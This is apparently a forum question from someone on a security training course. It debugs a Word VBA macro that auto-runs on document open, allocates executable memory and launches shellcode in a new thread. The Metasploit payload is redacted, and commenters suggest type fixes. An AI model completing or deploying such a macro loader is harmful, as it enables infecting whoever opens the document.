# VBA Run Shellcode in Memory showing type error

Tags: vba

I'm testing out running shellcode in memory for a training course and am hitting some issues with VBAs errors.

When I try to run the macro in Word I get the following error:

```
Compile Error: Type mismatch
```

This appears to point towards my use of `RtlMoveMemory` within my `Run()` functions. I have copied this verbatim from the course material and it appears to match other samples online.

I have tried modifying the types of `addr`, `data` and `counter` to `LongLong` or just `Long` but they seem to throw the same error. I am using a 64-bit version of Windows and my understanding is that `LongPtr` should be the correct 'bitness', 64.

What am I missing below? I have redacted the shellcode as it was a Metasploit payload.

```
Private Declare PtrSafe Function CreateThread Lib "KERNEL32" (ByVal SecurityAttributes As Long, ByVal StackSize As Long, ByVal StartFunction As LongPtr, ThreadParameter As LongPtr, ByVal CreateFlags As Long, ByRef ThreadId As Long) As LongPtr
Private Declare PtrSafe Function VirtualAlloc Lib "KERNEL32" (ByVal lpAddress As LongPtr, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
Private Declare PtrSafe Function RtlMoveMemory Lib "KERNEL32" (ByVal lDestination As LongPtr, ByRef sSource As Any, ByVal lLength As Long) As LongPtr

Function Run()
    Dim buf As Variant
    Dim addr As LongPtr
    Dim counter As Long
    Dim data As Long
    Dim res As Long

    buf = Array(.... _)
    
    addr = VirtualAlloc(0, UBound(buf), &H3000, &H40)
    For counter = LBound(buf) To UBound(buf)
        data = buf(counter)
        res = RtlMoveMemory(addr + counter, data, 1)
    Next counter

    res = CreateThread(0, 0, addr, 0, 0, 0)
End Function
    


Sub Document_Open()
 Run
End Sub
Sub AutoOpen()
 Run
End Sub
```

Comment: 32 bit or 64 bit depends on the application.

Comment: I'm using a default install of MS Word for this which should be 64-bit

Comment: *By default, Office 2010, 2013 and 2016 install the 32-bit version. You must explicitly choose to install the 64-bit version during setup. Starting with Office 2019 and Microsoft 365, the default is the 64-bit version.* If it is 64 bit make everything LongLong. LongPtr is for 32 or 64 bit.

Comment: Use byte arrays not variants.

Comment: https://learn.microsoft.com/en-us/office/vba/language/concepts/getting-started/64-bit-visual-basic-for-applications-overview